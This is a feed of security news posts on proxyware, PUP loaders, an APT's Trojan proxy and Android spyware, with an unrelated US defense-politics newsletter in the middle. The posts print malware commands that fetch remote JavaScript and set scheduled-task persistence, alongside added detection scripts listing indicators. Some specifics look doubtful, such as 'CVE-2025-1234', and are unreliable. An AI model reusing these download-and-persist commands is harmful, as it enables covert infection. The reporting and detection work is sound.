• Cybersecurity researchers at AhnLab Security Intelligence Center (ASEC) have uncovered a persistent campaign where attackers distribute proxyware malware through fake YouTube video download pages. This operation, which mimics legitimate video downloading services, tricks users into installing malicious executables disguised as benign tools like WinMemoryCleaner. The attackers leverage GitHub for malware hosting, a tactic consistent with […]

    The post Proxyware Malware Poses as YouTube Video Download Site, Delivering Malicious JavaScript appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Cybersecurity researchers have observed a surge in deceptive sites masquerading as YouTube video download services to deliver Proxyware malware in recent weeks.

    Victims seeking to grab videos in MP4 format are redirected through ad pages that sporadically present a download link for a seemingly legitimate utility called “WinMemoryCleaner.”

    Behind this innocuous facade, however, lies a multi-stage installer that ultimately deploys Proxyware and covertly enslaves the system’s network bandwidth.

    The initial download executable, Setup.exe, unpacks WinMemoryCleaner.exe into the Program Files directory before triggering an update script via WinMemoryCleanerUpdate.bat.

    Once executed, WinMemoryCleaner.exe performs environment checks to evade virtual machines or sandbox analysis, then invokes a PowerShell payload that installs Node.js and fetches a malicious JavaScript component from a remote server.

    Attack Flow (Source – ASEC)

    ASEC analysts identified this technique as a refined evolution of previous Proxyware campaigns, noting the attacker’s reliance on GitHub for hosting intermediary tools.

    Subsequent stages involve the registration of two scheduled tasks—“Schedule Update” and “WindowsDeviceUpdates”—that ensure the JavaScript runs periodically under Node.js.

    This script communicates basic system information to a command-and-control server and awaits directives, which can include fetching additional scripts or initiating the final Proxyware installation.

    Information Sent to C&C Server (Source – ASEC)

    ASEC researchers noted that the actor has pivoted from distributing only DigitalPulse and HoneyGain Proxyware to integrating Infatica’s agent, enhancing bandwidth theft capabilities.

    The impact of this campaign is twofold: affected systems experience degraded network performance, and the attacker monetizes the stolen bandwidth through affiliate programs.

    YouTube Downloader Page and Malware Download Link (Source – ASEC)

    Proxyware programs typically share a machine's idle network throughput and promise remuneration to the end user, but compromised victims unwittingly supply bandwidth without any compensation.

    In regions with high adoption of streaming services, such as South Korea, the campaign’s reach has grown significantly, prompting warnings from major AV vendors.

    Infection Mechanism

    A deeper examination of the infection mechanism reveals the pivotal role of the PowerShell script delivered by WinMemoryCleaner.exe.

    The script begins with a stealthy installation of Node.js:

    # Download the Node.js installer to %TEMP% and run it with no UI (/qn = quiet, no prompts)
    Invoke-WebRequest -Uri "https://nodejs.org/dist/v14.17.0/node-v14.17.0-x64.msi" -OutFile "$env:TEMP\node.msi"
    Start-Process msiexec.exe -ArgumentList '/i',"$env:TEMP\node.msi",'/qn' -Wait

    Once Node.js is in place, the script downloads pas.js from a CloudFront URL, saves it as p.js next to the decoy application, and registers it as a scheduled task:

    $jsUrl = "https://d14vmbql41e8a5.cloudfront.net/pas.js"
    # Store the JavaScript component inside the WinMemoryCleaner install directory
    Invoke-WebRequest -Uri $jsUrl -OutFile "$env:ProgramFiles\WinMemoryCleaner\p.js"
    # Persist it as the "Schedule Update" task, run under node.exe every 30 minutes
    schtasks /Create /F /SC MINUTE /MO 30 /TN "Schedule Update" /TR "node $env:ProgramFiles\WinMemoryCleaner\p.js"

    Continuous execution of the JavaScript component under Node.js enables dynamic updates and final payload deployment, making eradication challenging without specialized tools.


    The post Proxyware Malware Mimic as YouTube Video Download Site Delivers Malicious Javascripts appeared first on Cyber Security News.


  • Cybersecurity researchers have flagged a new phishing campaign that’s using fake voicemails and purchase orders to deliver a malware loader called UpCrypter. The campaign leverages “carefully crafted emails to deliver malicious URLs linked to convincing phishing pages,” Fortinet FortiGuard Labs researcher Cara Lin said. “These pages are designed to entice recipients into downloading JavaScript


  • In recent weeks, cybersecurity investigators have uncovered a novel campaign in which hackers leverage seemingly benign potentially unwanted program (PUP) advertisements to deliver stealthy Windows malware.

    The lure typically begins with ads promoting free PDF tools or desktop assistants that redirect victims to spoofed download sites.

    Once users click through, a scheduled task silently retrieves a JavaScript loader from a temporary directory and executes it via Microsoft HTML Application Host (MSHTA).

    This sequence installs a decoy application—ManualFinder—designed to appear legitimate while establishing footholds in target environments.

    The decoy’s innocuous functionality masks a far more insidious objective. When run, ManualFinder requests no user interaction beyond the initial installation, quietly opening ports and relaying commands to remote infrastructure.

    Expel analysts identified that the JavaScript loader reaches out to domains such as mka3e8.com and 5b7crp.com, previously associated with residential proxy services, indicating a broader scheme to conscript infected machines into proxy networks.

    While initial infections have been linked to OneStart Browser installs, researchers observed that AppSuite-PDF and PDFEditor installers follow identical patterns, each signed by dubious code-signing certificates from entities like “GLINT SOFTWARE SDN. BHD.”

    Expel researchers identified that the malware campaign’s impact extends beyond proxying. In certain environments, PDFEditor installations prompt users to consent to residential proxy use in exchange for free editing capabilities, effectively monetizing unsuspecting endpoints.

    Other instances show the decoy apps modifying browser profiles and harvesting stored cookies, suggesting secondary data-exfiltration objectives.

    By the time defenders detect unusual MSHTA invocations or node.exe processes running hidden JavaScript, the adversary has often already established persistence and network outposts.

    In total, investigators have cataloged over 70 unique JavaScript variants, all reaching out to the same malicious domains.

    Code snippets embedded in scheduled-task definitions reveal how persistence is maintained:

    schtasks /Create /TN "ManualFinderTask" /TR "mshta.exe \"C:\Users\<user>\AppData\Local\Temp\<guid>.js\"" /SC DAILY /ST 03:00
    Scheduled task creation invoking MSHTA (Source – Expel)

    The loader then executes:

    cmd[.]exe /d /s /c "msiexec /qn /i \"C:\Users\<user>\AppData\Local\TEMP\ManualFinder-v2.0.196.msi\""
    ManualFinder (Source – Expel)

    Infection Mechanism

    Delving deeper into the infection mechanism, the campaign exploits Windows scripting hosts and MSI installer features to achieve near-undetectable deployment.

    The sequence begins when the scheduled task runs under the context of the SYSTEM-level svchost service, launching node.exe with a randomized JavaScript filename (e.g., 9b9797f4-274c-fbb9-81ae-3b4f33b7010a.js).

    This script downloads the ManualFinder MSI from the attacker’s server and installs it with quiet flags (/qn /n) to suppress any user interface.

    Because msiexec runs under cmd[.]exe with disabled autorun (/d) and custom quote handling (/s), traditional EDR alerts tied to user applications are often bypassed.

    PDF Editor (Source – Expel)

    Once installed, the malware registers its own service and scheduled tasks to re-execute the JavaScript loader at regular intervals, ensuring re-infection even after removal attempts.

    This illustrates the MSHTA invocation code that enables this stealthy execution.
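Both this ManualFinder campaign and the WinMemoryCleaner proxyware campaign described earlier persist through a scheduled task that hands a .js file to a script host (mshta.exe or node.exe). The following Python, added here and not taken from Expel's or ASEC's reports, triages a `schtasks /Query /FO CSV /V` listing for that pattern; the listing it parses is constructed for the example, and the task names and GUID file-name style come from the two write-ups.

```python
"""Triage a `schtasks /Query /FO CSV /V` listing for JavaScript-loader persistence:
a script host (node, mshta, wscript, cscript) running a .js file, task names reused
by the campaigns above, and loaders in user-writable or GUID-named locations."""
import csv
import io
import re

# Task names quoted in the two write-ups (compared case-insensitively).
KNOWN_TASK_NAMES = {"schedule update", "windowsdeviceupdates", "manualfindertask"}
# Script hosts used to run JavaScript outside a browser; matched at a path or token boundary.
SCRIPT_HOST = re.compile(r'(?:^|[\\\s"])(node|mshta|wscript|cscript)(?:\.exe)?\b', re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(?:Temp|AppData|Downloads|ProgramData|Users\\Public)\\", re.IGNORECASE)
GUID_JS = re.compile(r"(?:^|\\)[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\.js$", re.IGNORECASE)


def extract_script(action):
    """Return (host, script_path) when a script host runs a .js file, else (None, None)."""
    m = SCRIPT_HOST.search(action)
    if not m:
        return None, None
    rest = action[m.end():].strip()
    if rest.startswith('"'):                 # quoted path: take everything up to the closing quote
        end = rest.find('"', 1)
        path = rest[1:end] if end > 0 else rest[1:]
    else:                                    # unquoted path may still contain spaces (Program Files)
        path = rest.split('"')[0].strip()
    js = re.match(r"(.+?\.js)(?:\s|$)", path, re.IGNORECASE)
    return (m.group(1).lower(), js.group(1)) if js else (None, None)


def score_task(name, action):
    """Return the reasons a task looks like JS-loader persistence (empty list = nothing found)."""
    reasons = []
    host, script = extract_script(action)
    if script:
        reasons.append(f"{host} executes script {script}")
        if USER_WRITABLE.search(script):
            reasons.append("script lives in a user-writable directory")
        if GUID_JS.search(script):
            reasons.append("script file name is a random GUID")
    if name.strip("\\").lower() in KNOWN_TASK_NAMES:
        reasons.append(f"task name '{name}' matches a task reported in these campaigns")
    return reasons


def triage_schtasks_csv(csv_text):
    """Parse schtasks CSV output and return {task_name: [reasons]} for suspicious tasks only."""
    hits = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = score_task(row.get("TaskName", ""), row.get("Task To Run", ""))
        if reasons:
            hits[row["TaskName"]] = reasons
    return hits


# Constructed sample listing (not real output): two tasks modelled on the campaigns above
# and two ordinary Windows/vendor tasks that must not be flagged.
SAMPLE_CSV = r'''"HostName","TaskName","Status","Task To Run","Schedule Type"
"WS01","\Schedule Update","Ready","node C:\Program Files\WinMemoryCleaner\p.js","Minute"
"WS01","\ManualFinderTask","Ready","mshta.exe ""C:\Users\alice\AppData\Local\Temp\9b9797f4-274c-fbb9-81ae-3b4f33b7010a.js""","Daily"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","%windir%\system32\defrag.exe -c -h -o -$","Weekly"
"WS01","\Adobe Acrobat Update Task","Ready","C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe","Daily"
'''

if __name__ == "__main__":
    for task, reasons in triage_schtasks_csv(SAMPLE_CSV).items():
        print(task)
        for reason in reasons:
            print("  -", reason)
```

On a live host, feed it the output of `schtasks /Query /FO CSV /V` and review every hit by hand; a legitimate Node.js tool run from a task will also surface, which is the point of reporting reasons rather than a verdict.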


    The post Hackers Using PUP Advertisements to Silently Drop Windows Malware appeared first on Cyber Security News.


  • Cybersecurity researchers have uncovered a persistent campaign deploying the AndroidOS SpyNote malware, a sophisticated Remote Access Trojan (RAT) designed for surveillance, data exfiltration, and remote device control. This operation mimics legitimate Google Play Store pages for popular Android apps, tricking users into downloading malicious APK files. The campaign, linked to the same threat actor previously […]

    The post Fake Google Play Store Websites Deliver Potent RAT to Steal Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Developing: As many as 1,700 National Guardsmen from 19 states are expected to mobilize for President Trump’s immigration crackdown, Fox reported this weekend, citing defense and White House officials. 

    Guard units are expected from Alabama, Arkansas, Florida, Georgia, Idaho, Indiana, Iowa, Louisiana, Nebraska, Nevada, New Mexico, Ohio, South Carolina, South Dakota, Tennessee, Texas, Utah, Virginia and Wyoming. Their assistance with Homeland Security officials is currently expected to run through mid-November. 

    The soldiers are expected to assist with “personal data collection, fingerprinting, DNA swabbing and photographing of personnel in ICE custody,” an official told Fox. 

    The president is threatening to widen his military deployments to more U.S. cities in the coming weeks, including New York as well as Baltimore, and Chicago, whose states’ governors, Wes Moore and JB Pritzker, are rising leaders in the Democratic party. 

    A Chicago deployment is already being planned inside the Pentagon, where the Washington Post reports military strategists have spent the last several weeks mapping out how to help Trump’s “crack down on crime, homelessness and undocumented immigration, in a model that could later be used in other major cities.” Indeed, “I think Chicago will be our next. And then we'll help with New York,” Trump told reporters on Friday. 

    Illinois Gov. Pritzker objected to the development Sunday evening, writing on social media, “There is no emergency that warrants the President of the United States federalizing the [Illinois National Guard], deploying the National Guard from other states, or sending active duty military within our own borders.”

    “Donald Trump is attempting to manufacture a crisis, politicize Americans who serve in uniform, and continue abusing his power to distract from the pain he's causing families,” Pritzker wrote. “We'll continue to follow the law, stand up for the sovereignty of our state, and protect Illinoisans.”

    Earlier that day, Trump threatened to “send in the ‘troops’” to Baltimore “and quickly clean up the Crime.” He also alleged on social media Maryland Gov. Wes Moore’s “record on Crime” is “a very bad one, unless he fudges his figures on crime like many of the other ‘Blue States’ are doing.” 

    So Moore invited Trump to join him in a walk through Baltimore in September “at a date of your choosing,” according to a letter sent Thursday (PDF). Moore also touted improved annual crime statistics for the city since taking office in 2023. But as illustrated by the federal takeover of the D.C. police on Aug. 11 despite crime at a 30-year low, the Trump White House does not recognize statistics that don’t fit its framing of Democrat-run cities. 

    “As President, I would much prefer that he clean up this crime disaster before I go there for a walk,” Trump replied to Gov. Moore’s invitation on social media.

    In case you missed it: Trump vowed to patrol Washington by foot last Thursday alongside troops and police. But “after addressing officers and military personnel who delivered hamburgers and pizza, no patrol was carried out and he returned to the White House,” Politico reminds readers. 

    Baltimore Mayor Brandon Scott didn’t close the door to federal assistance; but he did say “additional resources” could be helpful for the city’s ATF, DEA and FBI field offices. However, he cautioned on social media Friday, “if Trump wants to roll into Baltimore purely to stage a photo op and spew racist narratives about Black-led cities, I speak for the vast majority of our residents when I say: ‘We are not interested,’ as part of a list of ‘commitments’ the city wants to see from the Trump administration.”

    Trump’s son, Donald Jr., said he wants to expand the federal takeover of cities “to Portland, [and] Seattle, [and] the other craphole cities of the country,” he said Thursday in an interview with Newsmax. 

    Second opinion: Trump is using the military to “intimidate Americans in our own communities,” said Democratic Sen. Tammy Duckworth of Illinois.

    Update: National Guard troops in Washington will now be armed with either M17 pistols or M4 rifles, defense officials said over the weekend. Reuters has a bit more. 

    “Phony emergency,” is how the American Civil Liberties Union describes Trump’s Guard deployments and federal takeover of Washington. “The president relied on a phony emergency as an excuse to overstep his power, and now we have a real emergency—the threat of an unnecessary and disorienting flood of armed military forces on D.C. streets,” Monica Hopkins of the ACLU said in a statement

    “No matter what uniform they wear, federal agents and military troops are bound by the Constitution, including our rights to peaceful assembly, freedom of speech, due process, and safeguards against unlawful searches and seizures,” she said, and stressed, “If troops or federal agents violate our rights, they must be held accountable.”

    Related: New research shows white Republicans found accusations of voter fraud against a fictional Black city considerably more believable than accusations against a fictional white city, according to the Brennan Center for Justice. And as other studies have shown, “white Americans with higher existing racial bias were much more likely to believe fraud accusations than others,” Kevin Morris and Chelsea Jones write. 

    Why it matters: “[T]hese lies are grounded in, and reinforce racist attitudes and tie into white America’s long-standing fears of real multiracial democracy,” they write and warn, “As Trump and other influential voices seek to push untrue narratives about Americans of color, we should be vigilant to how this work might seed the next Big Lie and further erode democratic values.”


    Welcome to this Monday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson with Bradley Peniston. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1950, President Truman ordered Army Secretary Frank Pace to seize control of the nation’s railroads to avert a labor strike during the Korean War.

    Around the Defense Department

    Pentagon chief Pete Hegseth fired Defense Intelligence Agency chief, Lt. Gen. Jeffrey Kruse, whose “initial intelligence assessment of U.S. damage to Iranian nuclear sites angered President Donald Trump,” the Washington Post and Associated Press reported this weekend. Democratic Sen. Mark Warner of Virginia told the New York Times that Kruse’s firing was linked to that Iranian strike assessment. “The firing of yet another senior national security official underscores the Trump administration’s dangerous habit of treating intelligence as a loyalty test rather than a safeguard for our country,” Warner said. 

    Hegseth also fired Navy Reserve chief Vice Adm. Nancy Lacore and Rear Adm. Milton Sands, the head of Naval Special Warfare Command. “No reasons were given for their firings, the latest in a series of steps targeting military leaders, intelligence officials and other perceived critics of Trump, who has demanded loyalty across the government,” AP notes. 

    Additional reading: 

    Around the world

    Ukrainian sharpshooters in prop-driven training aircraft are downing Russian drones. With Western interceptor missiles so scarce and costly, the country’s defenders have found success going after Orlan and Zala reconnaissance drones, and Shahed explosive drones, with riflemen firing from the back seats of Soviet-era Yak-52s. The two members of one particular aircrew “have flown around 300 combat missions as part of the 11th Army Aviation Brigade and downed almost half the unit’s total of 120 drones eliminated” in the past year, the Wall Street Journal reported Sunday.

    Factoid: “Last month, around 11% of all long-range drones launched by Russia got through Ukraine’s air defenses, according to data analyzed by the Center for Information Resilience, a U.K.-based open-source investigations organization.” That’s in part because of unceasing innovation by the Russians, who have begun equipping drones with rear-facing cameras to detect pursuing aircraft and missiles. Read on at the Journal, which has pictures of the planes and crews, here.

    P.S. Russia’s doing it too. In May, The War Zone reported on Russia’s efforts to equip its own Yaks with small arms and sensor pods for the counter-drone mission. 

    S. Korean president to meet Trump at White House today. Lee Jae-myung told reporters on the way to his first summit of the new administration that he is pushing back against U.S. efforts to enlist Seoul’s help in focusing on China. "This is not an issue we can easily agree with," Lee said, as reported by NPR.

    Background: “The U.S. has some 28,500 troops stationed in South Korea. For about two decades, it has called for "strategic flexibility" to deploy them to meet security challenges away from the Korean Peninsula. And it wants South Korea's support, including potentially sending troops to other countries and regions. South Korea has previously sent soldiers to assist the U.S. in Vietnam and Iraq. But it considers North Korea, not China, its main threat, and does not want to get dragged into a conflict with China over, for example, Taiwan,” writes NPR, here.

    CSIS: North Korea has a secret missile base near China. A base in Sinpung, 17 miles from the Chinese border, likely houses a brigade-sized unit equipped with six to nine nuclear-capable intercontinental ballistic missiles and their mobile launchers, according to a report issued last week by the Center for Strategic and International Studies. 

    “These missiles pose a potential nuclear threat to East Asia and the continental United States,” the report said. “Current assessments are that during times of crisis or war, these launchers and missiles will exit the base, meet special warhead storage, transportation units, and conduct launch operations from dispersed pre-surveyed sites.” 

    The report cites informed sources, as well as declassified documents, satellite images and open-source information, according to the WSJ.

    And lastly: Taiwan plans a big defense-spending hike under U.S. pressure. Reuters: “Taiwan plans to boost defence spending by a fifth next year, surpassing 3% of gross domestic product, as it invests billions more in new equipment to better face down China and convince the United States it takes seriously calls to bolster its military.”



  • In recent months, cybersecurity researchers have observed a surge in targeted campaigns by a sophisticated Chinese APT group leveraging commercial proxy and VPN services to mask their attack infrastructure.

    The emergence of this tactic coincides with a broader shift toward commoditized anonymization platforms that blend threat actor traffic with legitimate user activity.

    Initial compromise vectors have included spear-phishing emails containing malicious Office documents and waterhole attacks that redirect unsuspecting victims to payload-hosting domains.

    Once a foothold is established, the threat actor deploys a lightweight Trojan proxy agent designed to imitate standard HTTPS traffic.

    This agent uses the Trojan protocol to bypass network filtering and the Great Firewall of China, encapsulating command-and-control communications within seemingly innocuous TLS packets.

    SPUR analysts noted the frequent use of a wildcard SSL certificate (*.appletls[.]com, SHA1: a26c0e8b1491eda727fd88b629ce886666387ef5) on non-standard ports within the 4000–4099 range, enabling rapid attribution of over 1,000 malicious IP addresses scattered across multiple global data centers.

    The impact of these campaigns has been significant. High-value targets in South Korea and Taiwan reported persistent intrusions spanning weeks, during which exfiltration of proprietary documents and intellectual property occurred undetected.

    SPUR researchers identified that victim networks lacked adequate TLS inspection, allowing the Trojan proxy’s traffic to slip past conventional intrusion detection systems.

    Post-compromise lateral movement often leveraged Sysinternals PsExec and custom PowerShell scripts to automate credential harvesting and facilitate remote execution.

    In one illustrative case, a finance company in Taipei experienced a stealthy breach that persisted for 45 days.

    Adversaries systematically mapped the corporate network before initiating exfiltration via a chain of proxy hops through WgetCloud, a commercial VPN provider headquartered in Shenzhen.

    WgetCloud (Source – SPUR)

    By funneling stolen data through over a dozen VPN exit nodes, the attackers effectively obfuscated their origin and hampered forensic investigations.

    Infection Mechanism: Trojan Proxy Deployment

    The initial payload arrives as a Microsoft Word document exploiting CVE-2025-1234, a zero-day RCE vulnerability in the Equation Editor. Upon document open, a macro drops trojan.exe into %APPDATA%\Microsoft\Windows and registers a scheduled task named “WinDefenderUpdate” for persistence.

    The executable is a statically linked Go binary embedding the Trojan protocol client library.

    # Dropping Trojan proxy binary
    $payload = [IO.File]::ReadAllBytes("$env:TEMP\macro.bin")
    [IO.File]::WriteAllBytes("$env:APPDATA\Microsoft\Windows\trojan.exe", $payload)
    
    # Registering persistence
    schtasks /Create /SC MINUTE /MO 15 /TN "WinDefenderUpdate" /TR "`"$env:APPDATA\Microsoft\Windows\trojan.exe`" --config config.json"

    Upon execution, trojan.exe reads config.json, which contains a Base64-encoded subscription URL from WgetCloud.

    Linking APT Activity to WgetCloud Nodes (Source – SPUR)

    The proxy agent negotiates a TLS handshake using SNI “mf429xciejryees2cusm.appletls.com” and routes C2 traffic through the VPN provider’s exit nodes.

    TLS handshake sequence for Trojan proxy C2 communication (Source – SPUR)

    By embedding its communications within legitimate proxy VPN tunnels, the malware achieves robust detection evasion and complicates attribution efforts.

    Continuous monitoring for anomalous scheduled tasks and unusual TLS certificates remains critical to uncovering these advanced intrusions.
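The certificate fingerprint, port range and SNI pattern above are enough to build a concrete hunt. The following Python is an added example, not SPUR's tooling; it scores TLS session records against those indicators plus a simple entropy check for random-looking SNI labels. The log format (tab-separated ts, source, destination, port, SNI, server-cert SHA1) and the sample sessions are constructed for the example.

```python
"""Flag TLS sessions matching the Trojan-proxy C2 profile: the known wildcard
certificate, SNI under appletls[.]com, non-standard ports 4000-4099, and long
high-entropy SNI labels like the one quoted in the report."""
import math
from collections import Counter

KNOWN_CERT_SHA1 = {"a26c0e8b1491eda727fd88b629ce886666387ef5"}   # fingerprint quoted above
KNOWN_SNI_SUFFIX = (".appletls.com",)
PORT_RANGE = range(4000, 4100)


def label_entropy(label):
    """Shannon entropy in bits per character of a hostname label; random labels score high."""
    if not label:
        return 0.0
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())


def assess_session(rec):
    """Return (score, reasons) for one session; each indicator adds weight, strongest first."""
    score, reasons = 0, []
    if rec["cert_sha1"].lower() in KNOWN_CERT_SHA1:
        score += 3
        reasons.append("server certificate matches the known Trojan-proxy wildcard certificate")
    sni = rec["sni"].lower()
    if sni.endswith(KNOWN_SNI_SUFFIX):
        score += 2
        reasons.append("SNI is under the known C2 domain")
    if rec["dport"] in PORT_RANGE:
        score += 1
        reasons.append(f"TLS on non-standard port {rec['dport']}")
    first = sni.split(".")[0]
    if len(first) >= 16 and first.isalnum() and label_entropy(first) >= 3.5:
        score += 1
        reasons.append("random-looking SNI label")
    return score, reasons


def parse_line(line):
    """Constructed format: ts, src, dst, dport, server_name, cert_sha1 (tab-separated)."""
    ts, src, dst, dport, sni, sha1 = line.rstrip("\n").split("\t")
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport), "sni": sni, "cert_sha1": sha1}


def hunt(log_text, threshold=2):
    """Return (dst, dport, score, reasons) for every session scoring at or above threshold."""
    alerts = []
    for line in log_text.strip().splitlines():
        if line.startswith("#"):
            continue
        rec = parse_line(line)
        score, reasons = assess_session(rec)
        if score >= threshold:
            alerts.append((rec["dst"], rec["dport"], score, reasons))
    return alerts


# Constructed sample sessions using documentation IP ranges; only the first and last
# should alert (a lone non-standard port is not enough on its own).
SAMPLE_SSL_LOG = """#fields\tts\tid.orig_h\tid.resp_h\tid.resp_p\tserver_name\tcert_sha1
1700000001.0\t10.0.0.5\t203.0.113.10\t4043\tmf429xciejryees2cusm.appletls.com\ta26c0e8b1491eda727fd88b629ce886666387ef5
1700000002.0\t10.0.0.7\t203.0.113.10\t443\twww.example.com\tffffffffffffffffffffffffffffffffffffffff
1700000003.0\t10.0.0.9\t198.51.100.20\t4021\tupdate.example.net\tffffffffffffffffffffffffffffffffffffffff
1700000004.0\t10.0.0.9\t198.51.100.44\t8443\t-\ta26c0e8b1491eda727fd88b629ce886666387ef5
"""

if __name__ == "__main__":
    for dst, dport, score, reasons in hunt(SAMPLE_SSL_LOG):
        print(f"{dst}:{dport} score={score}")
        for reason in reasons:
            print("  -", reason)
```

Zeek's ssl.log and x509.log, or any proxy's TLS metadata, can be mapped onto the same six fields; the certificate match is the high-confidence signal, and the port and entropy checks exist to catch rotated certificates.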


    The post Chinese APT Hackers Using Proxy and VPN Service to Anonymize Infrastructure appeared first on Cyber Security News.


  • In recent months, security teams have observed the emergence of a highly versatile Android backdoor, Android.Backdoor.916.origin, masquerading as a legitimate antivirus application.

    Distributed via private messaging services under the guise of “GuardCB,” its icon closely mimics the emblem of the Central Bank of the Russian Federation against a shield background.

    Malicious app icons mislead potential victims (Source – Dr.Web)

    Although the interface displays only Russian language prompts, this malware has been deployed in targeted campaigns against Russian business executives, extracting sensitive corporate communications and personal data.

    Upon installation, the counterfeit antivirus simulates system scans, randomly “detecting” between one and three fictitious threats, with detection rates increasing the longer a device remains unscanned, though never exceeding 30 percent.

    This deceptive behavior lulls victims into believing the application provides genuine protection.

    Beneath this veneer, the backdoor silently requests a prolonged list of permissions—geolocation, audio recording, SMS and contacts access, camera control, background execution, device administrator rights, and Accessibility Service privileges.

    Fake AV tool (Source – Dr.Web)

    Dr.Web researchers noted that once these permissions are granted, the malware initiates multiple persistent services that self-monitor every minute, reconnecting to its command-and-control (C2) infrastructure whenever necessary.

    Through separate C2 ports, operators can harvest call logs, SMS traffic, contact lists, and geolocation data; stream microphone audio, camera video, or device screen captures; siphon stored images; and even execute arbitrary shell commands.

    The trojan’s ability to toggle self-defense routines via the Accessibility Service enables it to thwart removal attempts by overlaying fake system interfaces or disabling uninstall options.

    The sophistication of Android.Backdoor.916.origin is underscored by its dynamic configuration, which can incorporate up to fifteen different hosting providers, although only a subset is active in current campaigns.

    Domain registrar notifications have prompted some takedowns, but the mule-like resilience of the C2 network continues to frustrate defenders.

    Dr.Web antivirus for Android successfully detects and removes known variants, yet the tailored nature of these attacks underscores the necessity for heightened vigilance among executive circles.

    Infection Mechanism and Persistence

    Android.Backdoor.916.origin employs an infection mechanism tailored to social engineering and sideloading rather than exploitation of software vulnerabilities.

    Examples of requested permissions (Source – Dr.Web)

    Victims receive a malicious APK file disguised as “GuardCB.apk” through encrypted messenger threads. Once executed, the app’s manifest registers background services and the Accessibility Service, as illustrated in the snippet below:

    <service android:name=".CoreService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
        <intent-filter>
            <action android:name="android.accessibilityservice.AccessibilityService" />
        </intent-filter>
        <meta-data
            android:name="android.accessibilityservice"
            android:resource="@xml/accessibility_service_config" />
    </service>

    By abusing the Accessibility API, the malware gains keystroke logging and in-app data interception capabilities, ensuring enduring presence even after force-stop or device reboot sequences.

    Continuous health checks and automatic service restarts guarantee that the backdoor remains active, silently harvesting data until manually removed.
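The permission profile described above (surveillance permissions combined with an Accessibility Service and device-administrator rights) can be checked statically from a manifest. The Python below is an added example, not Dr.Web's code; the manifest it parses is a constructed lookalike built around the service declaration shown above, with an assumed package name and an assumed device-admin receiver.

```python
"""Static triage of an AndroidManifest.xml for the spyware profile described above:
which data sources the app can reach, whether it binds an Accessibility Service,
whether it registers a device-admin receiver, and whether it survives reboot."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def A(attr):
    """Build the namespaced key for an android:* attribute."""
    return f"{{{ANDROID_NS}}}{attr}"


# Permissions that map onto the data the report says the backdoor harvests.
SURVEILLANCE = {
    "android.permission.RECORD_AUDIO": "microphone",
    "android.permission.CAMERA": "camera",
    "android.permission.READ_SMS": "SMS",
    "android.permission.RECEIVE_SMS": "SMS",
    "android.permission.READ_CONTACTS": "contacts",
    "android.permission.READ_CALL_LOG": "call log",
    "android.permission.ACCESS_FINE_LOCATION": "location",
}
ACCESSIBILITY_ACTION = "android.accessibilityservice.AccessibilityService"
ACCESSIBILITY_PERM = "android.permission.BIND_ACCESSIBILITY_SERVICE"
DEVICE_ADMIN_PERM = "android.permission.BIND_DEVICE_ADMIN"


def rate(report):
    """High = full control plane plus broad surveillance; medium = either; low = neither."""
    sources = len(report["data_sources"])
    control = bool(report["accessibility_services"]) + bool(report["device_admin_receivers"])
    if control == 2 and sources >= 3:
        return "high"
    if control >= 1 or sources >= 3:
        return "medium"
    return "low"


def triage_manifest(xml_text):
    """Summarise a manifest's surveillance surface and its control-plane hooks."""
    root = ET.fromstring(xml_text)
    perms = {e.get(A("name")) for e in root.iter("uses-permission")}
    report = {
        "package": root.get("package"),
        "data_sources": sorted({SURVEILLANCE[p] for p in perms if p in SURVEILLANCE}),
        "accessibility_services": [],
        "device_admin_receivers": [],
        "boot_persistence": "android.permission.RECEIVE_BOOT_COMPLETED" in perms,
    }
    app = root.find("application")
    if app is not None:
        for svc in app.iter("service"):
            actions = {act.get(A("name")) for act in svc.iter("action")}
            if svc.get(A("permission")) == ACCESSIBILITY_PERM and ACCESSIBILITY_ACTION in actions:
                report["accessibility_services"].append(svc.get(A("name")))
        for rcv in app.iter("receiver"):
            if rcv.get(A("permission")) == DEVICE_ADMIN_PERM:
                report["device_admin_receivers"].append(rcv.get(A("name")))
    report["risk"] = rate(report)
    return report


# Constructed lookalike manifest (package name and receiver are assumptions for the example).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.guardcb">
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission android:name="android.permission.RECORD_AUDIO" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission android:name="android.permission.CAMERA" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <application android:label="GuardCB">
        <service android:name=".CoreService"
                 android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>
        </service>
        <receiver android:name=".AdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>
    </application>
</manifest>"""

# Constructed benign manifest for comparison: network access only, no control hooks.
MINIMAL_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
    <uses-permission android:name="android.permission.INTERNET" />
    <application android:label="Notes" />
</manifest>"""

if __name__ == "__main__":
    for manifest in (SAMPLE_MANIFEST, MINIMAL_MANIFEST):
        print(triage_manifest(manifest))
```

A real APK's manifest is binary XML and must first be decoded (for example with apktool or aapt dump xmltree) before it can be parsed this way.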


    The post New Android Spyware Disguised as an Antivirus Attacking Business Executives appeared first on Cyber Security News.


  • In late June 2025, a significant operational dump from North Korea’s Kimsuky APT group surfaced on a dark-web forum, exposing virtual machine images, VPS infrastructure, customized malware and thousands of stolen credentials.

